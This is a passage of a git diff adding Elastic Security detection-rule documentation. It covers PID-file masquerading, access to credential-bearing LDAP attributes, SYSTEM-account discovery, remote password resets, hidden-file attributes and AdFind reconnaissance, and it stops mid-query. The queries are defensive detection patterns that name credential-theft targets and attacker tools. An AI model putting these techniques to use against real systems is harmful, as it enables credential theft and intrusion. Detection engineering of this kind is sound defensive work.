docs/detections/prebuilt-rules/rule-details/executable-file-with-unusual-extension.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/execution-from-a-removable-media-with-network-connection.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/execution-via-microsoft-dotnet-clickonce-host.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/execution-via-ms-visualstudio-pre-post-build-events.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/image-loaded-with-invalid-signature.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-dns-request-predicted-to-be-a-dga-domain.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-dns-request-with-a-high-dga-probability-score.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-suspicious-windows-event-predicted-to-be-malicious-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/machine-learning-detected-a-suspicious-windows-event-with-a-high-malicious-probability-score.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/machine-learning-detected-dga-activity-using-a-known-sunburst-dns-domain.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/memory-dump-file-with-unusual-extension.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/netcat-listener-established-via-rlwrap.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-credential-access-via-memory-dump-file-creation.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-destination-port.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-ip-address.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-iso-code.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-data-exfiltration-activity-to-an-unusual-region.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-dga-activity.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-dll-side-loading-via-trusted-microsoft-programs.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-file-transfer-via-certreq.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-linux-hack-tool-launched.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-network-scan-executed-from-host.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-privilege-escalation-via-python-cap-setuid.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-process-injection-from-malicious-document.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-remote-file-execution-via-msiexec.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-ssh-it-ssh-worm-downloaded.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/potential-upgrade-of-non-interactive-shell.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/remote-xsl-script-execution-via-com.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/setcap-setuid-setgid-capability-set.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/spike-in-bytes-sent-to-an-external-device-via-airdrop.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/spike-in-bytes-sent-to-an-external-device.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/suspicious-execution-via-msiexec.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/suspicious-troubleshooting-pack-cabinet-execution.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-host.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-parent-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/suspicious-windows-process-cluster-spawned-by-a-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/tainted-kernel-module-load.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/unix-socket-connection.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/unsigned-bits-service-client-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-host.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-parent-process.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/unusual-process-spawned-by-a-user.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/unusual-process-writing-data-to-an-external-device.asciidoc create mode 100644 docs/detections/prebuilt-rules/rule-details/windows-installer-with-suspicious-properties.asciidoc diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-abnormal-process-id-or-lock-file-created.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-abnormal-process-id-or-lock-file-created.asciidoc new file mode 100644 index 0000000000..1fbd707ca3 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-abnormal-process-id-or-lock-file-created.asciidoc @@ -0,0 +1,122 @@ +[[prebuilt-rule-8-10-5-abnormal-process-id-or-lock-file-created]] +=== Abnormal Process ID or Lock File Created + +Identifies the creation of a Process ID (PID), lock or reboot file created in temporary file storage paradigm (tmpfs) directory /var/run. On Linux, the PID files typically hold the process ID to track previous copies running and manage other tasks. Certain Linux malware use the /var/run directory for holding data, executables and other tasks, disguising itself or these files as legitimate PID files. + +*Rule type*: new_terms + +*Rule indices*: + +* logs-endpoint.events.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.sandflysecurity.com/blog/linux-file-masquerading-and-malicious-pids-sandfly-1-2-6-update/ +* https://twitter.com/GossiTheDog/status/1522964028284411907 +* https://exatrack.com/public/Tricephalic_Hellkeeper.pdf +* https://www.elastic.co/security-labs/a-peek-behind-the-bpfdoor + +*Tags*: + +* Domain: Endpoint +* OS: Linux +* Use Case: Threat Detection +* Tactic: Execution +* Threat: BPFDoor +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 210 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Abnormal Process ID or Lock File Created + +Linux applications may need to save their process identification number (PID) for various purposes: from signaling that a program is running to serving as a signal that a previous instance of an application didn't exit successfully. PID files contain its creator process PID in an integer value. + +Linux lock files are used to coordinate operations in files so that conflicts and race conditions are prevented. + +This rule identifies the creation of PID, lock, or reboot files in the /var/run/ directory. Attackers can masquerade malware, payloads, staged data for exfiltration, and more as legitimate PID files. + +#### Possible investigation steps + +- Retrieve the file and determine if it is malicious: + - Check the contents of the PID files. They should only contain integer strings. + - Check the file type of the lock and PID files to determine if they are executables. This is only observed in malicious files. + - Check the size of the subject file. Legitimate PID files should be under 10 bytes. + - Check if the lock or PID file has high entropy. This typically indicates an encrypted payload. + - Analysts can use tools like `ent` to measure entropy. + - Examine the reputation of the SHA-256 hash in the PID file. Use a database like VirusTotal to identify additional pivots and artifacts for investigation. +- Trace the file's creation to ensure it came from a legitimate or authorized process. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Investigate any abnormal account behavior, such as command executions, file creations or modifications, and network connections. +- Investigate any abnormal behavior by the subject process such as network connections, file modifications, and any spawned child processes. + +### False positive analysis + +- False positives can appear if the PID file is legitimate and holding a process ID as intended. If the PID file is an executable or has a file size that's larger than 10 bytes, it should be ruled suspicious. +- If this activity is expected and noisy in your environment, consider adding exceptions — preferably with a combination of file name and process executable conditions. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Block the identified indicators of compromise (IoCs). +- Take actions to terminate processes and connections used by the attacker. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +host.os.type:linux and event.category:file and event.action:creation and +user.id:0 and file.extension:(pid or lock or reboot) and file.path:(/var/run/* or /run/*) and ( + (process.name : ( + bash or dash or sh or tcsh or csh or zsh or ksh or fish or ash or touch or nano or vim or vi or editor or mv or cp) + ) or ( + process.executable : ( + ./* or /tmp/* or /var/tmp/* or /dev/shm/* or /var/run/* or /boot/* or /srv/* or /run/* + )) +) and not process.name : (go or git or containerd* or snap-confine) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Execution +** ID: TA0002 +** Reference URL: https://attack.mitre.org/tactics/TA0002/ +* Technique: +** Name: Native API +** ID: T1106 +** Reference URL: https://attack.mitre.org/techniques/T1106/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-access-to-a-sensitive-ldap-attribute.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-access-to-a-sensitive-ldap-attribute.asciidoc new file mode 100644 index 0000000000..e6708794ea --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-access-to-a-sensitive-ldap-attribute.asciidoc @@ -0,0 +1,130 @@ +[[prebuilt-rule-8-10-5-access-to-a-sensitive-ldap-attribute]] +=== Access to a Sensitive LDAP Attribute + +Identify access to sensitive Active Directory object attributes that contains credentials and decryption keys such as unixUserPassword, ms-PKI-AccountCredentials and msPKI-CredentialRoamingTokens. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://www.mandiant.com/resources/blog/apt29-windows-credential-roaming +* https://social.technet.microsoft.com/wiki/contents/articles/11483.windows-credential-roaming.aspx +* https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-5136 + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Credential Access +* Tactic: Privilege Escalation +* Use Case: Active Directory Monitoring +* Data Source: Active Directory + +*Version*: 8 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +The 'Audit Directory Service Access' logging policy must be configured for (Success, Failure). +Steps to implement the logging policy with Advanced Audit Configuration: + +``` +Computer Configuration > +Policies > +Windows Settings > +Security Settings > +Advanced Audit Policies Configuration > +Audit Policies > +DS Access > +Audit Directory Service Access (Success,Failure) +``` +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +any where event.action == "Directory Service Access" and event.code == "4662" and + + not winlog.event_data.SubjectUserSid : "S-1-5-18" and + + winlog.event_data.Properties : ( + /* unixUserPassword */ + "*612cb747-c0e8-4f92-9221-fdd5f15b550d*", + + /* ms-PKI-AccountCredentials */ + "*b8dfa744-31dc-4ef1-ac7c-84baf7ef9da7*", + + /* ms-PKI-DPAPIMasterKeys */ + "*b3f93023-9239-4f7c-b99c-6745d87adbc2*", + + /* msPKI-CredentialRoamingTokens */ + "*b7ff5a38-0818-42b0-8110-d3d154c97f24*" + ) and + + /* + Excluding noisy AccessMasks + 0x0 undefined and 0x100 Control Access + https://learn.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4662 + */ + not winlog.event_data.AccessMask in ("0x0", "0x100") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Credential Access +** ID: TA0006 +** Reference URL: https://attack.mitre.org/tactics/TA0006/ +* Technique: +** Name: OS Credential Dumping +** ID: T1003 +** Reference URL: https://attack.mitre.org/techniques/T1003/ +* Technique: +** Name: Unsecured Credentials +** ID: T1552 +** Reference URL: https://attack.mitre.org/techniques/T1552/ +* Sub-technique: +** Name: Private Keys +** ID: T1552.004 +** Reference URL: https://attack.mitre.org/techniques/T1552/004/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Domain Accounts +** ID: T1078.002 +** Reference URL: https://attack.mitre.org/techniques/T1078/002/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-account-discovery-command-via-system-account.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-account-discovery-command-via-system-account.asciidoc new file mode 100644 index 0000000000..703bc2095e --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-account-discovery-command-via-system-account.asciidoc @@ -0,0 +1,114 @@ +[[prebuilt-rule-8-10-5-account-discovery-command-via-system-account]] +=== Account Discovery Command via SYSTEM Account + +Identifies when the SYSTEM account uses an account discovery utility. This could be a sign of discovery activity after an adversary has achieved privilege escalation. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Discovery +* Tactic: Privilege Escalation +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Account Discovery Command via SYSTEM Account + +After successfully compromising an environment, attackers may try to gain situational awareness to plan their next steps. This can happen by running commands to enumerate network resources, users, connections, files, and installed security software. + +This rule looks for the execution of account discovery utilities using the SYSTEM account, which is commonly observed after attackers successfully perform privilege escalation or exploit web applications. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. + - If the process tree includes a web-application server process such as w3wp, httpd.exe, nginx.exe and alike, investigate any suspicious file creation or modification in the last 48 hours to assess the presence of any potential webshell backdoor. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Determine how the SYSTEM account is being used. For example, users with administrator privileges can spawn a system shell using Windows services, scheduled tasks or other third party utilities. + +### False positive analysis + +- Discovery activities are not inherently malicious if they occur in isolation. As long as the analyst did not identify suspicious activity related to the user or host, such alerts can be dismissed. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved hosts to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection via the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +- Use the data collected through the analysis to investigate other machines affected in the environment. +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (?process.Ext.token.integrity_level_name : "System" or + ?winlog.event_data.IntegrityLevel : "System") and + (process.name : "whoami.exe" or + (process.name : "net1.exe" and not process.parent.name : "net.exe")) + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Discovery +** ID: TA0007 +** Reference URL: https://attack.mitre.org/tactics/TA0007/ +* Technique: +** Name: System Owner/User Discovery +** ID: T1033 +** Reference URL: https://attack.mitre.org/techniques/T1033/ +* Tactic: +** Name: Privilege Escalation +** ID: TA0004 +** Reference URL: https://attack.mitre.org/tactics/TA0004/ +* Technique: +** Name: Valid Accounts +** ID: T1078 +** Reference URL: https://attack.mitre.org/techniques/T1078/ +* Sub-technique: +** Name: Local Accounts +** ID: T1078.003 +** Reference URL: https://attack.mitre.org/techniques/T1078/003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-account-password-reset-remotely.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-account-password-reset-remotely.asciidoc new file mode 100644 index 0000000000..6da941547f --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-account-password-reset-remotely.asciidoc @@ -0,0 +1,89 @@ +[[prebuilt-rule-8-10-5-account-password-reset-remotely]] +=== Account Password Reset Remotely + +Identifies an attempt to reset a potentially privileged account password remotely. Adversaries may manipulate account passwords to maintain access or evade password duration policies and preserve compromised credentials. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-system.* +* logs-windows.* + +*Severity*: medium + +*Risk score*: 47 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* https://docs.microsoft.com/en-us/windows/security/threat-protection/auditing/event-4724 +* https://stealthbits.com/blog/manipulating-user-passwords-with-mimikatz/ +* https://github.com/sbousseaden/EVTX-ATTACK-SAMPLES/blob/master/Credential%20Access/remote_pwd_reset_rpc_mimikatz_postzerologon_target_DC.evtx +* https://www.elastic.co/security-labs/detect-credential-access + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Persistence +* Tactic: Impact + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Rule query + + +[source, js] +---------------------------------- +sequence by winlog.computer_name with maxspan=5m + [authentication where event.action == "logged-in" and + /* event 4624 need to be logged */ + winlog.logon.type : "Network" and event.outcome == "success" and source.ip != null and + source.ip != "127.0.0.1" and source.ip != "::1"] by winlog.event_data.TargetLogonId + /* event 4724 need to be logged */ + [iam where event.action == "reset-password" and + ( + /* + This rule is very noisy if not scoped to privileged accounts, duplicate the + rule and add your own naming convention and accounts of interest here. + */ + winlog.event_data.TargetUserName: ("*Admin*", "*super*", "*SVC*", "*DC0*", "*service*", "*DMZ*", "*ADM*") or + winlog.event_data.TargetSid : ("S-1-5-21-*-500", "S-1-12-1-*-500") + ) + ] by winlog.event_data.SubjectLogonId + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ +* Technique: +** Name: Account Manipulation +** ID: T1098 +** Reference URL: https://attack.mitre.org/techniques/T1098/ +* Tactic: +** Name: Impact +** ID: TA0040 +** Reference URL: https://attack.mitre.org/tactics/TA0040/ +* Technique: +** Name: Account Access Removal +** ID: T1531 +** Reference URL: https://attack.mitre.org/techniques/T1531/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adding-hidden-file-attribute-via-attrib.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adding-hidden-file-attribute-via-attrib.asciidoc new file mode 100644 index 0000000000..ae3d27d993 --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adding-hidden-file-attribute-via-attrib.asciidoc @@ -0,0 +1,146 @@ +[[prebuilt-rule-8-10-5-adding-hidden-file-attribute-via-attrib]] +=== Adding Hidden File Attribute via Attrib + +Adversaries can add the 'hidden' attribute to files to hide them from the user in an attempt to evade detection. + +*Rule type*: eql + +*Rule indices*: + +* winlogbeat-* +* logs-endpoint.events.* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: None + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Defense Evasion +* Tactic: Persistence +* Data Source: Elastic Endgame +* Resources: Investigation Guide +* Data Source: Elastic Defend + +*Version*: 109 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating Adding Hidden File Attribute via Attrib + +The `Hidden` attribute is a file or folder attribute that makes the file or folder invisible to regular directory listings when the attribute is set. + +Attackers can use this attribute to conceal tooling and malware to prevent administrators and users from finding it, even if they are looking specifically for it. + +This rule looks for the execution of the `attrib.exe` utility with a command line that indicates the modification of the `Hidden` attribute. + +> **Note**: +> This investigation guide uses the {security-guide}/security/master/invest-guide-run-osquery.html[Osquery Markdown Plugin] introduced in Elastic Stack version 8.5.0. Older Elastic Stack versions will display unrendered Markdown in this guide. + +#### Possible investigation steps + +- Identify the user account that performed the action and whether it should perform this kind of action. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Investigate other alerts associated with the user/host during the past 48 hours. +- Examine the command line to identify the target file or folder. + - Examine the file, which process created it, header, etc. + - If suspicious, retrieve the files' SHA-256 hash values using the PowerShell `Get-FileHash` cmdlet and search for the existence and reputation of the hashes in resources like VirusTotal, Hybrid-Analysis, CISCO Talos, Any.run, etc. +- Examine the host for derived artifacts that indicate suspicious activities: + - Observe and collect information about the following activities in the alert subject host: + - Attempts to contact external domains and addresses. + - Use the Elastic Defend network events to determine domains and addresses contacted by the subject process by filtering by the process' `process.entity_id`. + - Examine the DNS cache for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve DNS Cache","query":"SELECT * FROM dns_cache"}} + - Use the Elastic Defend registry events to examine registry keys accessed, modified, or created by the related processes in the process tree. + - Examine the host services for suspicious or anomalous entries. + - !{osquery{"label":"Osquery - Retrieve All Services","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services"}} + - !{osquery{"label":"Osquery - Retrieve Services Running on User Accounts","query":"SELECT description, display_name, name, path, pid, service_type, start_type, status, user_account FROM services WHERE\nNOT (user_account LIKE '%LocalSystem' OR user_account LIKE '%LocalService' OR user_account LIKE '%NetworkService' OR\nuser_account == null)\n"}} + - !{osquery{"label":"Osquery - Retrieve Service Unsigned Executables with Virustotal Link","query":"SELECT concat('https://www.virustotal.com/gui/file/', sha1) AS VtLink, name, description, start_type, status, pid,\nservices.path FROM services JOIN authenticode ON services.path = authenticode.path OR services.module_path =\nauthenticode.path JOIN hash ON services.path = hash.path WHERE authenticode.result != 'trusted'\n"}} + +### False positive analysis + +- This activity is unlikely to happen legitimately. Benign true positives (B-TPs) can be added as exceptions if necessary. + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- If the triage identified malware, search the environment for additional compromised hosts. + - Implement temporary network rules, procedures, and segmentation to contain the malware. + - Stop suspicious processes. + - Immediately block the identified indicators of compromise (IoCs). + - Inspect the affected systems for additional malware backdoors like reverse shells, reverse proxies, or droppers that attackers could use to reinfect the system. +- Remove and block malicious artifacts identified during triage. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). + +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : "attrib.exe" or process.pe.original_file_name == "ATTRIB.EXE") and process.args : "+h" and + not + (process.parent.name: "cmd.exe" and + process.command_line: "attrib +R +H +S +A *.cui" and + process.parent.command_line: "?:\\WINDOWS\\system32\\cmd.exe /c \"?:\\WINDOWS\\system32\\*.bat\"") + +---------------------------------- + +*Framework*: MITRE ATT&CK^TM^ + +* Tactic: +** Name: Defense Evasion +** ID: TA0005 +** Reference URL: https://attack.mitre.org/tactics/TA0005/ +* Technique: +** Name: Hide Artifacts +** ID: T1564 +** Reference URL: https://attack.mitre.org/techniques/T1564/ +* Sub-technique: +** Name: Hidden Files and Directories +** ID: T1564.001 +** Reference URL: https://attack.mitre.org/techniques/T1564/001/ +* Technique: +** Name: File and Directory Permissions Modification +** ID: T1222 +** Reference URL: https://attack.mitre.org/techniques/T1222/ +* Sub-technique: +** Name: Windows File and Directory Permissions Modification +** ID: T1222.001 +** Reference URL: https://attack.mitre.org/techniques/T1222/001/ +* Tactic: +** Name: Persistence +** ID: TA0003 +** Reference URL: https://attack.mitre.org/tactics/TA0003/ diff --git a/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adfind-command-activity.asciidoc b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adfind-command-activity.asciidoc new file mode 100644 index 0000000000..15088feb8c --- /dev/null +++ b/docs/detections/prebuilt-rules/downloadable-packages/8-10-5/prebuilt-rule-8-10-5-adfind-command-activity.asciidoc @@ -0,0 +1,144 @@ +[[prebuilt-rule-8-10-5-adfind-command-activity]] +=== AdFind Command Activity + +This rule detects the Active Directory query tool, AdFind.exe. AdFind has legitimate purposes, but it is frequently leveraged by threat actors to perform post-exploitation Active Directory reconnaissance. The AdFind tool has been observed in Trickbot, Ryuk, Maze, and FIN6 campaigns. For Winlogbeat, this rule requires Sysmon. + +*Rule type*: eql + +*Rule indices*: + +* logs-endpoint.events.* +* winlogbeat-* +* logs-windows.* +* endgame-* + +*Severity*: low + +*Risk score*: 21 + +*Runs every*: 5m + +*Searches indices from*: now-9m ({ref}/common-options.html#date-math[Date Math format], see also <<rule-schedule, `Additional look-back time`>>) + +*Maximum alerts per execution*: 100 + +*References*: + +* http://www.joeware.net/freetools/tools/adfind/ +* https://thedfirreport.com/2020/05/08/adfind-recon/ +* https://www.fireeye.com/blog/threat-research/2020/05/tactics-techniques-procedures-associated-with-maze-ransomware-incidents.html +* https://www.cybereason.com/blog/dropping-anchor-from-a-trickbot-infection-to-the-discovery-of-the-anchor-malware +* https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html +* https://usa.visa.com/dam/VCOM/global/support-legal/documents/fin6-cybercrime-group-expands-threat-To-ecommerce-merchants.pdf + +*Tags*: + +* Domain: Endpoint +* OS: Windows +* Use Case: Threat Detection +* Tactic: Discovery +* Resources: Investigation Guide +* Data Source: Elastic Endgame +* Data Source: Elastic Defend + +*Version*: 107 + +*Rule authors*: + +* Elastic + +*Rule license*: Elastic License v2 + + +==== Investigation guide + + +[source, markdown] +---------------------------------- +## Triage and analysis + +### Investigating AdFind Command Activity + +[AdFind](http://www.joeware.net/freetools/tools/adfind/) is a freely available command-line tool used to retrieve information from Active Directory (AD). Network discovery and enumeration tools like `AdFind` are useful to adversaries in the same ways they are effective for network administrators. This tool provides quick ability to scope AD person/computer objects and understand subnets and domain information. There are many [examples](https://thedfirreport.com/category/adfind/) of this tool being adopted by ransomware and criminal groups and used in compromises. + +#### Possible investigation steps + +- Investigate the process execution chain (parent process tree) for unknown processes. Examine their executable files for prevalence, whether they are located in expected locations, and if they are signed with valid digital signatures. +- Identify the user account that performed the action and whether it should perform this kind of action. +- Examine the command line to determine what information was retrieved by the tool. +- Contact the account owner and confirm whether they are aware of this activity. +- Investigate other alerts associated with the user/host during the past 48 hours. + +### False positive analysis + +- This rule has a high chance to produce false positives as it is a legitimate tool used by network administrators. +- If this rule is noisy in your environment due to expected activity, consider adding exceptions — preferably with a combination of user and command line conditions. +- Malicious behavior with `AdFind` should be investigated as part of a step within an attack chain. It doesn't happen in isolation, so reviewing previous logs/activity from impacted machines can be very telling. + +### Related rules + +- Windows Network Enumeration - 7b8bfc26-81d2-435e-965c-d722ee397ef1 +- Enumeration of Administrator Accounts - 871ea072-1b71-4def-b016-6278b505138d +- Enumeration Command Spawned via WMIPrvSE - 770e0c4d-b998-41e5-a62e-c7901fd7f470 + +### Response and remediation + +- Initiate the incident response process based on the outcome of the triage. +- Isolate the involved host to prevent further post-compromise behavior. +- Investigate credential exposure on systems compromised or used by the attacker to ensure all compromised accounts are identified. Reset passwords for these accounts and other potentially compromised credentials, such as email, business systems, and web services. +- Run a full antimalware scan. This may reveal additional artifacts left in the system, persistence mechanisms, and malware components. +- Determine the initial vector abused by the attacker and take action to prevent reinfection through the same vector. +- Using the incident response data, update logging and audit policies to improve the mean time to detect (MTTD) and the mean time to respond (MTTR). +---------------------------------- + +==== Rule query + + +[source, js] +---------------------------------- +process where host.os.type == "windows" and event.type == "start" and + (process.name : "AdFind.exe" or process.pe.original_file_name == "AdFind.exe") and + process.args : ("objectcategory=computer", "(objectcategory=computer)", + "objectcategory=person", "(objectcategory=person)", + "objectcategory=subnet", "(objectcategory=subnet)", + "objectcategory=group", "(objectcategory=group)", + "objectcategory=organizationalunit", "(objectcategory=organizationalunit)", + "objectcategory=attributeschema", "(objectcategory=attributeschema)", + "domainlist", "dcmodes", "adinfo", "dclist", 